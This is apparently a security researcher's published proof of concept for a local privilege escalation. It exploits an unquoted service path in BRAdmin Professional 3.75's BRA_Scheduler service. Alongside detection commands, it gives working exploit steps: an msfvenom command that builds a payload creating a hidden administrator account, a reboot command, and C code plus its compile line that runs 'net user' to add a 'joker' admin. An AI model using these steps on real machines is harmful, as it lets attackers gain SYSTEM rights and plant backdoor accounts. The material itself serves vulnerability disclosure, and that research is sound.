UI
  • ABOUT US
  • UNSAFE
    • sAMAccountName Spoofing in the Forest
    • Pass-the-Hash Attack Over Named Pipes Against ESET Server Security
    • Netcat Relay
    • Hiren's BootCD in the AD
    • Abusing LAPS
  • INLINE
    • Asena
    • Suyla
    • dcFinder
  • 0DAY
    • ADManager Plus Build < 7210 Elevation of Privilege Vulnerability (CVE-2024-24409)
    • Asp.Net Zero v12.3.0 - HTML Injection Leads To Open Redirect via Websockets (CVE-2023-48003)
    • ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure (CVE-2023-31492)
    • Multiple ManageEngine Applications Critical Information Disclosure Vulnerability
    • Thecus N4800Eco Nas Server Control Panel Comand Injection
    • ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
    • Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
    • KLOG Server (Authenticated) Command Injection (CVE-2021-3317)
    • Cokpit version 234 - Server Side Request Forgery (CVE-2020-35850)
    • KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
    • Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
    • Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
    • BRAdmin Professional 3.75 - Unquoted Service Path
Powered by GitBook
On this page
  • Proof Of Concept
  • Steps to Reproduce:

Was this helpful?

  1. 0DAY

BRAdmin Professional 3.75 - Unquoted Service Path

BRAdmin Professional 3.75 - BRA_Scheduler Unquoted Service Path Privilege Escalation

"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."

Proof Of Concept

If a user can insert a executable which is called as "BRAdmin" under the C:\Program Files (x86)\Brother\ directory , local system privileges could be obtained by the user.

For example, an user that has administrative privileges can obtain SYSTEM privileges through the vulnerable service.

This situation is valuable, especially if additional writing permission is applied to \Brother\ directory for unprivileged user.

#Detection of unquoted service path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler                             
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe                 
Auto


C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BRA_Scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Brother BRAdminPro Scheduler
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Steps to Reproduce:

1- User has a write privilege to \Brother\ directory and creates msfvenom payload that adds new localadmin user to Windows computer.

msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe 

2- Then user downloads this executable under the \Brother\ directory and restarts the computer.

For restarting computer from command line:

shutdown /r /t 0

3- After the restarting process , unsafe user will be created and added the local Administrators group.

Windows Defender will detect the BRAdmin.exe executable as malicious after the unsafeuser is added the local administrators group if target didn't make last Windows update properly.

Or below code could be used after compiling with gcc.

#include <stdlib.h>
int main ()
{
int i;
    i = system("net user joker j@k3r.. /add & net localgroup Administrators joker /add");
return 0;
}

i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe

# Author: Metin Yunus Kandemir
PreviousIntel(r) Management and Security Application 5.2 - UNS Unquoted Service Path

Last updated 1 year ago

Was this helpful?

LogoBRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service PathExploit Database